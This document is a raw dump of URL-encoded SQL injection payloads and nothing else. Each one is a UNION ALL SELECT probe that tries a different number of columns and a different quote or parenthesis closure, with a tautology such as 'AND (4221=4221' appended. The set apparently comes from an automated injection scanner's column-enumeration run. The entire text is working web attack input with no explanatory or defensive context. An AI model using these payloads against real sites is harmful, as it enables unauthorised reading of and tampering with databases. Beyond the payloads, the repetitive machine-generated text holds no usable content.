-1582%22%20UNION%20ALL%20SELECT%209209%2C%209209%2C%209209%2C%209209%2C%209209%2C%209209%2C%209209%2C%209209%2C%209209%2C%209209%2C%209209%2C%209209%2C%209209%2C%209209%2C%209209%2C%209209%2C%209209%2C%209209%2C%209209%2C%209209%2C%209209%2C%209209%2C%209209%2C%209209%2C%209209%2C%209209%2C%209209%2C%209209%2C%209209%2C%209209%2C%209209%2C%209209%2C%209209%2C%209209%2C%209209%2C%209209--%20 -2764%22%20UNION%20ALL%20SELECT%201104%2C%201104%2C%201104%2C%201104%2C%201104%2C%201104%2C%201104%2C%201104%2C%201104%2C%201104%2C%201104%2C%201104%2C%201104%2C%201104%2C%201104%2C%201104%2C%201104%2C%201104%2C%201104%2C%201104%2C%201104%2C%201104%2C%201104%2C%201104%2C%201104%2C%201104%2C%201104%2C%201104%2C%201104%2C%201104%2C%201104%2C%201104%2C%201104%2C%201104%2C%201104%2C%201104%2C%201104--%20 -4738%22%20UNION%20ALL%20SELECT%202051%2C%202051%2C%202051%2C%202051%2C%202051%2C%202051%2C%202051%2C%202051%2C%202051%2C%202051%2C%202051%2C%202051%2C%202051%2C%202051%2C%202051%2C%202051%2C%202051%2C%202051%2C%202051%2C%202051%2C%202051%2C%202051%2C%202051%2C%202051%2C%202051%2C%202051%2C%202051%2C%202051%2C%202051%2C%202051%2C%202051%2C%202051%2C%202051%2C%202051%2C%202051%2C%202051%2C%202051%2C%202051--%20 -9882%22%20UNION%20ALL%20SELECT%208030%2C%208030%2C%208030%2C%208030%2C%208030%2C%208030%2C%208030%2C%208030%2C%208030%2C%208030%2C%208030%2C%208030%2C%208030%2C%208030%2C%208030%2C%208030%2C%208030%2C%208030%2C%208030%2C%208030%2C%208030%2C%208030%2C%208030%2C%208030%2C%208030%2C%208030%2C%208030%2C%208030%2C%208030%2C%208030%2C%208030%2C%208030%2C%208030%2C%208030%2C%208030%2C%208030%2C%208030%2C%208030%2C%208030--%20 -6516%22%20UNION%20ALL%20SELECT%207280%2C%207280%2C%207280%2C%207280%2C%207280%2C%207280%2C%207280%2C%207280%2C%207280%2C%207280%2C%207280%2C%207280%2C%207280%2C%207280%2C%207280%2C%207280%2C%207280%2C%207280%2C%207280%2C%207280%2C%207280%2C%207280%2C%207280%2C%207280%2C%207280%2C%207280%2C%207280%2C%207280%2C%207280%2C%207280%2C%207280%2C%207280%2C%207280%2C%207280%2C%207280%2C%207280%2C%207280%2C%207280%2C%207280%2C%207280--%20 -6412%29%20UNION%20ALL%20SELECT%208766%2C%208766%2C%208766%2C%208766%2C%208766%2C%208766%2C%208766%2C%208766%2C%208766%2C%208766%2C%208766%2C%208766%2C%208766%2C%208766%2C%208766%2C%208766%2C%208766%2C%208766%2C%208766%2C%208766%2C%208766%2C%208766%2C%208766%2C%208766%2C%208766%2C%208766%2C%208766%2C%208766%2C%208766%2C%208766%2C%208766--%20%20AND%20%284221%3D4221 -3140%29%20UNION%20ALL%20SELECT%205319%2C%205319%2C%205319%2C%205319%2C%205319%2C%205319%2C%205319%2C%205319%2C%205319%2C%205319%2C%205319%2C%205319%2C%205319%2C%205319%2C%205319%2C%205319%2C%205319%2C%205319%2C%205319%2C%205319%2C%205319%2C%205319%2C%205319%2C%205319%2C%205319%2C%205319%2C%205319%2C%205319%2C%205319%2C%205319%2C%205319%2C%205319--%20%20AND%20%281760%3D1760 -4328%29%20UNION%20ALL%20SELECT%203741%2C%203741%2C%203741%2C%203741%2C%203741%2C%203741%2C%203741%2C%203741%2C%203741%2C%203741%2C%203741%2C%203741%2C%203741%2C%203741%2C%203741%2C%203741%2C%203741%2C%203741%2C%203741%2C%203741%2C%203741%2C%203741%2C%203741%2C%203741%2C%203741%2C%203741%2C%203741%2C%203741%2C%203741%2C%203741%2C%203741%2C%203741%2C%203741--%20%20AND%20%287984%3D7984 -5617%29%20UNION%20ALL%20SELECT%204596%2C%204596%2C%204596%2C%204596%2C%204596%2C%204596%2C%204596%2C%204596%2C%204596%2C%204596%2C%204596%2C%204596%2C%204596%2C%204596%2C%204596%2C%204596%2C%204596%2C%204596%2C%204596%2C%204596%2C%204596%2C%204596%2C%204596%2C%204596%2C%204596%2C%204596%2C%204596%2C%204596%2C%204596%2C%204596%2C%204596%2C%204596%2C%204596%2C%204596--%20%20AND%20%286760%3D6760 -6435%29%20UNION%20ALL%20SELECT%204805%2C%204805%2C%204805%2C%204805%2C%204805%2C%204805%2C%204805%2C%204805%2C%204805%2C%204805%2C%204805%2C%204805%2C%204805%2C%204805%2C%204805%2C%204805%2C%204805%2C%204805%2C%204805%2C%204805%2C%204805%2C%204805%2C%204805%2C%204805%2C%204805%2C%204805%2C%204805%2C%204805%2C%204805%2C%204805%2C%204805%2C%204805%2C%204805%2C%204805%2C%204805--%20%20AND%20%281917%3D1917 -7236%29%20UNION%20ALL%20SELECT%201198%2C%201198%2C%201198%2C%201198%2C%201198%2C%201198%2C%201198%2C%201198%2C%201198%2C%201198%2C%201198%2C%201198%2C%201198%2C%201198%2C%201198%2C%201198%2C%201198%2C%201198%2C%201198%2C%201198%2C%201198%2C%201198%2C%201198%2C%201198%2C%201198%2C%201198%2C%201198%2C%201198%2C%201198%2C%201198%2C%201198%2C%201198%2C%201198%2C%201198%2C%201198%2C%201198--%20%20AND%20%288631%3D8631 -1198%29%20UNION%20ALL%20SELECT%208548%2C%208548%2C%208548%2C%208548%2C%208548%2C%208548%2C%208548%2C%208548%2C%208548%2C%208548%2C%208548%2C%208548%2C%208548%2C%208548%2C%208548%2C%208548%2C%208548%2C%208548%2C%208548%2C%208548%2C%208548%2C%208548%2C%208548%2C%208548%2C%208548%2C%208548%2C%208548%2C%208548%2C%208548%2C%208548%2C%208548%2C%208548%2C%208548%2C%208548%2C%208548%2C%208548%2C%208548--%20%20AND%20%281728%3D1728 -1370%29%20UNION%20ALL%20SELECT%201196%2C%201196%2C%201196%2C%201196%2C%201196%2C%201196%2C%201196%2C%201196%2C%201196%2C%201196%2C%201196%2C%201196%2C%201196%2C%201196%2C%201196%2C%201196%2C%201196%2C%201196%2C%201196%2C%201196%2C%201196%2C%201196%2C%201196%2C%201196%2C%201196%2C%201196%2C%201196%2C%201196%2C%201196%2C%201196%2C%201196%2C%201196%2C%201196%2C%201196%2C%201196%2C%201196%2C%201196%2C%201196--%20%20AND%20%282736%3D2736 -6379%29%20UNION%20ALL%20SELECT%201073%2C%201073%2C%201073%2C%201073%2C%201073%2C%201073%2C%201073%2C%201073%2C%201073%2C%201073%2C%201073%2C%201073%2C%201073%2C%201073%2C%201073%2C%201073%2C%201073%2C%201073%2C%201073%2C%201073%2C%201073%2C%201073%2C%201073%2C%201073%2C%201073%2C%201073%2C%201073%2C%201073%2C%201073%2C%201073%2C%201073%2C%201073%2C%201073%2C%201073%2C%201073%2C%201073%2C%201073%2C%201073%2C%201073--%20%20AND%20%283032%3D3032 -6986%29%20UNION%20ALL%20SELECT%204682%2C%204682%2C%204682%2C%204682%2C%204682%2C%204682%2C%204682%2C%204682%2C%204682%2C%204682%2C%204682%2C%204682%2C%204682%2C%204682%2C%204682%2C%204682%2C%204682%2C%204682%2C%204682%2C%204682%2C%204682%2C%204682%2C%204682%2C%204682%2C%204682%2C%204682%2C%204682%2C%204682%2C%204682%2C%204682%2C%204682%2C%204682%2C%204682%2C%204682%2C%204682%2C%204682%2C%204682%2C%204682%2C%204682%2C%204682--%20%20AND%20%285902%3D5902 -5343%29%29%20UNION%20ALL%20SELECT%207885%2C%207885%2C%207885%2C%207885%2C%207885%2C%207885%2C%207885%2C%207885%2C%207885%2C%207885%2C%207885%2C%207885%2C%207885%2C%207885%2C%207885%2C%207885%2C%207885%2C%207885%2C%207885%2C%207885%2C%207885%2C%207885%2C%207885%2C%207885%2C%207885%2C%207885%2C%207885%2C%207885%2C%207885%2C%207885%2C%207885--%20%20AND%20%28%289750%3D9750 -1359%29%29%20UNION%20ALL%20SELECT%208518%2C%208518%2C%208518%2C%208518%2C%208518%2C%208518%2C%208518%2C%208518%2C%208518%2C%208518%2C%208518%2C%208518%2C%208518%2C%208518%2C%208518%2C%208518%2C%208518%2C%208518%2C%208518%2C%208518%2C%208518%2C%208518%2C%208518%2C%208518%2C%208518%2C%208518%2C%208518%2C%208518%2C%208518%2C%208518%2C%208518%2C%208518--%20%20AND%20%28%282936%3D2936 -8095%29%29%20UNION%20ALL%20SELECT%203062%2C%203062%2C%203062%2C%203062%2C%203062%2C%203062%2C%203062%2C%203062%2C%203062%2C%203062%2C%203062%2C%203062%2C%203062%2C%203062%2C%203062%2C%203062%2C%203062%2C%203062%2C%203062%2C%203062%2C%203062%2C%203062%2C%203062%2C%203062%2C%203062%2C%203062%2C%203062%2C%203062%2C%203062%2C%203062%2C%203062%2C%203062%2C%203062--%20%20AND%20%28%289265%3D9265 -5029%29%29%20UNION%20ALL%20SELECT%204406%2C%204406%2C%204406%2C%204406%2C%204406%2C%204406%2C%204406%2C%204406%2C%204406%2C%204406%2C%204406%2C%204406%2C%204406%2C%204406%2C%204406%2C%204406%2C%204406%2C%204406%2C%204406%2C%204406%2C%204406%2C%204406%2C%204406%2C%204406%2C%204406%2C%204406%2C%204406%2C%204406%2C%204406%2C%204406%2C%204406%2C%204406%2C%204406%2C%204406--%20%20AND%20%28%282499%3D2499 -5495%29%29%20UNION%20ALL%20SELECT%205614%2C%205614%2C%205614%2C%205614%2C%205614%2C%205614%2C%205614%2C%205614%2C%205614%2C%205614%2C%205614%2C%205614%2C%205614%2C%205614%2C%205614%2C%205614%2C%205614%2C%205614%2C%205614%2C%205614%2C%205614%2C%205614%2C%205614%2C%205614%2C%205614%2C%205614%2C%205614%2C%205614%2C%205614%2C%205614%2C%205614%2C%205614%2C%205614%2C%205614%2C%205614--%20%20AND%20%28%283234%3D3234 -7770%29%29%20UNION%20ALL%20SELECT%204789%2C%204789%2C%204789%2C%204789%2C%204789%2C%204789%2C%204789%2C%204789%2C%204789%2C%204789%2C%204789%2C%204789%2C%204789%2C%204789%2C%204789%2C%204789%2C%204789%2C%204789%2C%204789%2C%204789%2C%204789%2C%204789%2C%204789%2C%204789%2C%204789%2C%204789%2C%204789%2C%204789%2C%204789%2C%204789%2C%204789%2C%204789%2C%204789%2C%204789%2C%204789%2C%204789--%20%20AND%20%28%289100%3D9100 -2134%29%29%20UNION%20ALL%20SELECT%208824%2C%208824%2C%208824%2C%208824%2C%208824%2C%208824%2C%208824%2C%208824%2C%208824%2C%208824%2C%208824%2C%208824%2C%208824%2C%208824%2C%208824%2C%208824%2C%208824%2C%208824%2C%208824%2C%208824%2C%208824%2C%208824%2C%208824%2C%208824%2C%208824%2C%208824%2C%208824%2C%208824%2C%208824%2C%208824%2C%208824%2C%208824%2C%208824%2C%208824%2C%208824%2C%208824%2C%208824--%20%20AND%20%28%281027%3D1027 -5750%29%29%20UNION%20ALL%20SELECT%205852%2C%205852%2C%205852%2C%205852%2C%205852%2C%205852%2C%205852%2C%205852%2C%205852%2C%205852%2C%205852%2C%205852%2C%205852%2C%205852%2C%205852%2C%205852%2C%205852%2C%205852%2C%205852%2C%205852%2C%205852%2C%205852%2C%205852%2C%205852%2C%205852%2C%205852%2C%205852%2C%205852%2C%205852%2C%205852%2C%205852%2C%205852%2C%205852%2C%205852%2C%205852%2C%205852%2C%205852%2C%205852--%20%20AND%20%28%284134%3D4134 -6968%29%29%20UNION%20ALL%20SELECT%209855%2C%209855%2C%209855%2C%209855%2C%209855%2C%209855%2C%209855%2C%209855%2C%209855%2C%209855%2C%209855%2C%209855%2C%209855%2C%209855%2C%209855%2C%209855%2C%209855%2C%209855%2C%209855%2C%209855%2C%209855%2C%209855%2C%209855%2C%209855%2C%209855%2C%209855%2C%209855%2C%209855%2C%209855%2C%209855%2C%209855%2C%209855%2C%209855%2C%209855%2C%209855%2C%209855%2C%209855%2C%209855%2C%209855--%20%20AND%20%28%282887%3D2887 -2999%29%29%20UNION%20ALL%20SELECT%207521%2C%207521%2C%207521%2C%207521%2C%207521%2C%207521%2C%207521%2C%207521%2C%207521%2C%207521%2C%207521%2C%207521%2C%207521%2C%207521%2C%207521%2C%207521%2C%207521%2C%207521%2C%207521%2C%207521%2C%207521%2C%207521%2C%207521%2C%207521%2C%207521%2C%207521%2C%207521%2C%207521%2C%207521%2C%207521%2C%207521%2C%207521%2C%207521%2C%207521%2C%207521%2C%207521%2C%207521%2C%207521%2C%207521%2C%207521--%20%20AND%20%28%286453%3D6453 -6437%29%29%29%20UNION%20ALL%20SELECT%201990%2C%201990%2C%201990%2C%201990%2C%201990%2C%201990%2C%201990%2C%201990%2C%201990%2C%201990%2C%201990%2C%201990%2C%201990%2C%201990%2C%201990%2C%201990%2C%201990%2C%201990%2C%201990%2C%201990%2C%201990%2C%201990%2C%201990%2C%201990%2C%201990%2C%201990%2C%201990%2C%201990%2C%201990%2C%201990%2C%201990--%20%20AND%20%28%28%281783%3D1783 -7002%29%29%29%20UNION%20ALL%20SELECT%203406%2C%203406%2C%203406%2C%203406%2C%203406%2C%203406%2C%203406%2C%203406%2C%203406%2C%203406%2C%203406%2C%203406%2C%203406%2C%203406%2C%203406%2C%203406%2C%203406%2C%203406%2C%203406%2C%203406%2C%203406%2C%203406%2C%203406%2C%203406%2C%203406%2C%203406%2C%203406%2C%203406%2C%203406%2C%203406%2C%203406%2C%203406--%20%20AND%20%28%28%284606%3D4606 -2793%29%29%29%20UNION%20ALL%20SELECT%203042%2C%203042%2C%203042%2C%203042%2C%203042%2C%203042%2C%203042%2C%203042%2C%203042%2C%203042%2C%203042%2C%203042%2C%203042%2C%203042%2C%203042%2C%203042%2C%203042%2C%203042%2C%203042%2C%203042%2C%203042%2C%203042%2C%203042%2C%203042%2C%203042%2C%203042%2C%203042%2C%203042%2C%203042%2C%203042%2C%203042%2C%203042%2C%203042--%20%20AND%20%28%28%283211%3D3211 -6765%29%29%29%20UNION%20ALL%20SELECT%203114%2C%203114%2C%203114%2C%203114%2C%203114%2C%203114%2C%203114%2C%203114%2C%203114%2C%203114%2C%203114%2C%203114%2C%203114%2C%203114%2C%203114%2C%203114%2C%203114%2C%203114%2C%203114%2C%203114%2C%203114%2C%203114%2C%203114%2C%203114%2C%203114%2C%203114%2C%203114%2C%203114%2C%203114%2C%203114%2C%203114%2C%203114%2C%203114%2C%203114--%20%20AND%20%28%28%285986%3D5986 -6166%29%29%29%20UNION%20ALL%20SELECT%207225%2C%207225%2C%207225%2C%207225%2C%207225%2C%207225%2C%207225%2C%207225%2C%207225%2C%207225%2C%207225%2C%207225%2C%207225%2C%207225%2C%207225%2C%207225%2C%207225%2C%207225%2C%207225%2C%207225%2C%207225%2C%207225%2C%207225%2C%207225%2C%207225%2C%207225%2C%207225%2C%207225%2C%207225%2C%207225%2C%207225%2C%207225%2C%207225%2C%207225%2C%207225--%20%20AND%20%28%28%286605%3D6605 -3175%29%29%29%20UNION%20ALL%20SELECT%202707%2C%202707%2C%202707%2C%202707%2C%202707%2C%202707%2C%202707%2C%202707%2C%202707%2C%202707%2C%202707%2C%202707%2C%202707%2C%202707%2C%202707%2C%202707%2C%202707%2C%202707%2C%202707%2C%202707%2C%202707%2C%202707%2C%202707%2C%202707%2C%202707%2C%202707%2C%202707%2C%202707%2C%202707%2C%202707%2C%202707%2C%202707%2C%202707%2C%202707%2C%202707%2C%202707--%20%20AND%20%28%28%286272%3D6272 -1332%29%29%29%20UNION%20ALL%20SELECT%206206%2C%206206%2C%206206%2C%206206%2C%206206%2C%206206%2C%206206%2C%206206%2C%206206%2C%206206%2C%206206%2C%206206%2C%206206%2C%206206%2C%206206%2C%206206%2C%206206%2C%206206%2C%206206%2C%206206%2C%206206%2C%206206%2C%206206%2C%206206%2C%206206%2C%206206%2C%206206%2C%206206%2C%206206%2C%206206%2C%206206%2C%206206%2C%206206%2C%206206%2C%206206%2C%206206%2C%206206--%20%20AND%20%28%28%287272%3D7272 -4627%29%29%29%20UNION%20ALL%20SELECT%201134%2C%201134%2C%201134%2C%201134%2C%201134%2C%201134%2C%201134%2C%201134%2C%201134%2C%201134%2C%201134%2C%201134%2C%201134%2C%201134%2C%201134%2C%201134%2C%201134%2C%201134%2C%201134%2C%201134%2C%201134%2C%201134%2C%201134%2C%201134%2C%201134%2C%201134%2C%201134%2C%201134%2C%201134%2C%201134%2C%201134%2C%201134%2C%201134%2C%201134%2C%201134%2C%201134%2C%201134%2C%201134--%20%20AND%20%28%28%286093%3D6093 -1379%29%29%29%20UNION%20ALL%20SELECT%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749--%20%20AND%20%28%28%288280%3D8280 -6054%29%29%29%20UNION%20ALL%20SELECT%203743%2C%203743%2C%203743%2C%203743%2C%203743%2C%203743%2C%203743%2C%203743%2C%203743%2C%203743%2C%203743%2C%203743%2C%203743%2C%203743%2C%203743%2C%203743%2C%203743%2C%203743%2C%203743%2C%203743%2C%203743%2C%203743%2C%203743%2C%203743%2C%203743%2C%203743%2C%203743%2C%203743%2C%203743%2C%203743%2C%203743%2C%203743%2C%203743%2C%203743%2C%203743%2C%203743%2C%203743%2C%203743%2C%203743%2C%203743--%20%20AND%20%28%28%284524%3D4524 -3409%20UNION%20ALL%20SELECT%202188%2C%202188%2C%202188%2C%202188%2C%202188%2C%202188%2C%202188%2C%202188%2C%202188%2C%202188%2C%202188%2C%202188%2C%202188%2C%202188%2C%202188%2C%202188%2C%202188%2C%202188%2C%202188%2C%202188%2C%202188%2C%202188%2C%202188%2C%202188%2C%202188%2C%202188%2C%202188%2C%202188%2C%202188%2C%202188%2C%202188--%20 -2131%20UNION%20ALL%20SELECT%201130%2C%201130%2C%201130%2C%201130%2C%201130%2C%201130%2C%201130%2C%201130%2C%201130%2C%201130%2C%201130%2C%201130%2C%201130%2C%201130%2C%201130%2C%201130%2C%201130%2C%201130%2C%201130%2C%201130%2C%201130%2C%201130%2C%201130%2C%201130%2C%201130%2C%201130%2C%201130%2C%201130%2C%201130%2C%201130%2C%201130%2C%201130--%20 -2816%20UNION%20ALL%20SELECT%207571%2C%207571%2C%207571%2C%207571%2C%207571%2C%207571%2C%207571%2C%207571%2C%207571%2C%207571%2C%207571%2C%207571%2C%207571%2C%207571%2C%207571%2C%207571%2C%207571%2C%207571%2C%207571%2C%207571%2C%207571%2C%207571%2C%207571%2C%207571%2C%207571%2C%207571%2C%207571%2C%207571%2C%207571%2C%207571%2C%207571%2C%207571%2C%207571--%20 -5346%20UNION%20ALL%20SELECT%203955%2C%203955%2C%203955%2C%203955%2C%203955%2C%203955%2C%203955%2C%203955%2C%203955%2C%203955%2C%203955%2C%203955%2C%203955%2C%203955%2C%203955%2C%203955%2C%203955%2C%203955%2C%203955%2C%203955%2C%203955%2C%203955%2C%203955%2C%203955%2C%203955%2C%203955%2C%203955%2C%203955%2C%203955%2C%203955%2C%203955%2C%203955%2C%203955%2C%203955--%20 -3400%20UNION%20ALL%20SELECT%202527%2C%202527%2C%202527%2C%202527%2C%202527%2C%202527%2C%202527%2C%202527%2C%202527%2C%202527%2C%202527%2C%202527%2C%202527%2C%202527%2C%202527%2C%202527%2C%202527%2C%202527%2C%202527%2C%202527%2C%202527%2C%202527%2C%202527%2C%202527%2C%202527%2C%202527%2C%202527%2C%202527%2C%202527%2C%202527%2C%202527%2C%202527%2C%202527%2C%202527%2C%202527--%20 -9274%20UNION%20ALL%20SELECT%206928%2C%206928%2C%206928%2C%206928%2C%206928%2C%206928%2C%206928%2C%206928%2C%206928%2C%206928%2C%206928%2C%206928%2C%206928%2C%206928%2C%206928%2C%206928%2C%206928%2C%206928%2C%206928%2C%206928%2C%206928%2C%206928%2C%206928%2C%206928%2C%206928%2C%206928%2C%206928%2C%206928%2C%206928%2C%206928%2C%206928%2C%206928%2C%206928%2C%206928%2C%206928%2C%206928--%20 -4374%20UNION%20ALL%20SELECT%204358%2C%204358%2C%204358%2C%204358%2C%204358%2C%204358%2C%204358%2C%204358%2C%204358%2C%204358%2C%204358%2C%204358%2C%204358%2C%204358%2C%204358%2C%204358%2C%204358%2C%204358%2C%204358%2C%204358%2C%204358%2C%204358%2C%204358%2C%204358%2C%204358%2C%204358%2C%204358%2C%204358%2C%204358%2C%204358%2C%204358%2C%204358%2C%204358%2C%204358%2C%204358%2C%204358%2C%204358--%20 -9488%20UNION%20ALL%20SELECT%208992%2C%208992%2C%208992%2C%208992%2C%208992%2C%208992%2C%208992%2C%208992%2C%208992%2C%208992%2C%208992%2C%208992%2C%208992%2C%208992%2C%208992%2C%208992%2C%208992%2C%208992%2C%208992%2C%208992%2C%208992%2C%208992%2C%208992%2C%208992%2C%208992%2C%208992%2C%208992%2C%208992%2C%208992%2C%208992%2C%208992%2C%208992%2C%208992%2C%208992%2C%208992%2C%208992%2C%208992%2C%208992--%20 -2327%20UNION%20ALL%20SELECT%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884--%20 -2559%20UNION%20ALL%20SELECT%207843%2C%207843%2C%207843%2C%207843%2C%207843%2C%207843%2C%207843%2C%207843%2C%207843%2C%207843%2C%207843%2C%207843%2C%207843%2C%207843%2C%207843%2C%207843%2C%207843%2C%207843%2C%207843%2C%207843%2C%207843%2C%207843%2C%207843%2C%207843%2C%207843%2C%207843%2C%207843%2C%207843%2C%207843%2C%207843%2C%207843%2C%207843%2C%207843%2C%207843%2C%207843%2C%207843%2C%207843%2C%207843%2C%207843%2C%207843--%20 -2525%27%29%20UNION%20ALL%20SELECT%201777%2C%201777%2C%201777%2C%201777%2C%201777%2C%201777%2C%201777%2C%201777%2C%201777%2C%201777%2C%201777%2C%201777%2C%201777%2C%201777%2C%201777%2C%201777%2C%201777%2C%201777%2C%201777%2C%201777%2C%201777%2C%201777%2C%201777%2C%201777%2C%201777%2C%201777%2C%201777%2C%201777%2C%201777%2C%201777%2C%201777--%20%20AND%20%28%27sbbq%27%3D%27sbbq -8335%27%29%20UNION%20ALL%20SELECT%204344%2C%204344%2C%204344%2C%204344%2C%204344%2C%204344%2C%204344%2C%204344%2C%204344%2C%204344%2C%204344%2C%204344%2C%204344%2C%204344%2C%204344%2C%204344%2C%204344%2C%204344%2C%204344%2C%204344%2C%204344%2C%204344%2C%204344%2C%204344%2C%204344%2C%204344%2C%204344%2C%204344%2C%204344%2C%204344%2C%204344%2C%204344--%20%20AND%20%28%27Xlwo%27%3D%27Xlwo -6115%27%29%20UNION%20ALL%20SELECT%205553%2C%205553%2C%205553%2C%205553%2C%205553%2C%205553%2C%205553%2C%205553%2C%205553%2C%205553%2C%205553%2C%205553%2C%205553%2C%205553%2C%205553%2C%205553%2C%205553%2C%205553%2C%205553%2C%205553%2C%205553%2C%205553%2C%205553%2C%205553%2C%205553%2C%205553%2C%205553%2C%205553%2C%205553%2C%205553%2C%205553%2C%205553%2C%205553--%20%20AND%20%28%27nkOm%27%3D%27nkOm -5291%27%29%20UNION%20ALL%20SELECT%206294%2C%206294%2C%206294%2C%206294%2C%206294%2C%206294%2C%206294%2C%206294%2C%206294%2C%206294%2C%206294%2C%206294%2C%206294%2C%206294%2C%206294%2C%206294%2C%206294%2C%206294%2C%206294%2C%206294%2C%206294%2C%206294%2C%206294%2C%206294%2C%206294%2C%206294%2C%206294%2C%206294%2C%206294%2C%206294%2C%206294%2C%206294%2C%206294%2C%206294--%20%20AND%20%28%27DfLI%27%3D%27DfLI -5106%27%29%20UNION%20ALL%20SELECT%201015%2C%201015%2C%201015%2C%201015%2C%201015%2C%201015%2C%201015%2C%201015%2C%201015%2C%201015%2C%201015%2C%201015%2C%201015%2C%201015%2C%201015%2C%201015%2C%201015%2C%201015%2C%201015%2C%201015%2C%201015%2C%201015%2C%201015%2C%201015%2C%201015%2C%201015%2C%201015%2C%201015%2C%201015%2C%201015%2C%201015%2C%201015%2C%201015%2C%201015%2C%201015--%20%20AND%20%28%27JLQI%27%3D%27JLQI -3796%27%29%20UNION%20ALL%20SELECT%209003%2C%209003%2C%209003%2C%209003%2C%209003%2C%209003%2C%209003%2C%209003%2C%209003%2C%209003%2C%209003%2C%209003%2C%209003%2C%209003%2C%209003%2C%209003%2C%209003%2C%209003%2C%209003%2C%209003%2C%209003%2C%209003%2C%209003%2C%209003%2C%209003%2C%209003%2C%209003%2C%209003%2C%209003%2C%209003%2C%209003%2C%209003%2C%209003%2C%209003%2C%209003%2C%209003--%20%20AND%20%28%27gITe%27%3D%27gITe -8338%27%29%20UNION%20ALL%20SELECT%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372--%20%20AND%20%28%27oJFw%27%3D%27oJFw -4908%27%29%20UNION%20ALL%20SELECT%204214%2C%204214%2C%204214%2C%204214%2C%204214%2C%204214%2C%204214%2C%204214%2C%204214%2C%204214%2C%204214%2C%204214%2C%204214%2C%204214%2C%204214%2C%204214%2C%204214%2C%204214%2C%204214%2C%204214%2C%204214%2C%204214%2C%204214%2C%204214%2C%204214%2C%204214%2C%204214%2C%204214%2C%204214%2C%204214%2C%204214%2C%204214%2C%204214%2C%204214%2C%204214%2C%204214%2C%204214%2C%204214--%20%20AND%20%28%27hmjP%27%3D%27hmjP -2961%27%29%20UNION%20ALL%20SELECT%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495--%20%20AND%20%28%27PVPN%27%3D%27PVPN -1906%27%29%20UNION%20ALL%20SELECT%204108%2C%204108%2C%204108%2C%204108%2C%204108%2C%204108%2C%204108%2C%204108%2C%204108%2C%204108%2C%204108%2C%204108%2C%204108%2C%204108%2C%204108%2C%204108%2C%204108%2C%204108%2C%204108%2C%204108%2C%204108%2C%204108%2C%204108%2C%204108%2C%204108%2C%204108%2C%204108%2C%204108%2C%204108%2C%204108%2C%204108%2C%204108%2C%204108%2C%204108%2C%204108%2C%204108%2C%204108%2C%204108%2C%204108%2C%204108--%20%20AND%20%28%27rpCi%27%3D%27rpCi -2002%27%29%29%20UNION%20ALL%20SELECT%202728%2C%202728%2C%202728%2C%202728%2C%202728%2C%202728%2C%202728%2C%202728%2C%202728%2C%202728%2C%202728%2C%202728%2C%202728%2C%202728%2C%202728%2C%202728%2C%202728%2C%202728%2C%202728%2C%202728%2C%202728%2C%202728%2C%202728%2C%202728%2C%202728%2C%202728%2C%202728%2C%202728%2C%202728%2C%202728%2C%202728--%20%20AND%20%28%28%27vpYR%27%3D%27vpYR -3688%27%29%29%20UNION%20ALL%20SELECT%207729%2C%207729%2C%207729%2C%207729%2C%207729%2C%207729%2C%207729%2C%207729%2C%207729%2C%207729%2C%207729%2C%207729%2C%207729%2C%207729%2C%207729%2C%207729%2C%207729%2C%207729%2C%207729%2C%207729%2C%207729%2C%207729%2C%207729%2C%207729%2C%207729%2C%207729%2C%207729%2C%207729%2C%207729%2C%207729%2C%207729%2C%207729--%20%20AND%20%28%28%27CnlP%27%3D%27CnlP -6343%27%29%29%20UNION%20ALL%20SELECT%209990%2C%209990%2C%209990%2C%209990%2C%209990%2C%209990%2C%209990%2C%209990%2C%209990%2C%209990%2C%209990%2C%209990%2C%209990%2C%209990%2C%209990%2C%209990%2C%209990%2C%209990%2C%209990%2C%209990%2C%209990%2C%209990%2C%209990%2C%209990%2C%209990%2C%209990%2C%209990%2C%209990%2C%209990%2C%209990%2C%209990%2C%209990%2C%209990--%20%20AND%20%28%28%27DZxe%27%3D%27DZxe -7936%27%29%29%20UNION%20ALL%20SELECT%201078%2C%201078%2C%201078%2C%201078%2C%201078%2C%201078%2C%201078%2C%201078%2C%201078%2C%201078%2C%201078%2C%201078%2C%201078%2C%201078%2C%201078%2C%201078%2C%201078%2C%201078%2C%201078%2C%201078%2C%201078%2C%201078%2C%201078%2C%201078%2C%201078%2C%201078%2C%201078%2C%201078%2C%201078%2C%201078%2C%201078%2C%201078%2C%201078%2C%201078--%20%20AND%20%28%28%27avBQ%27%3D%27avBQ 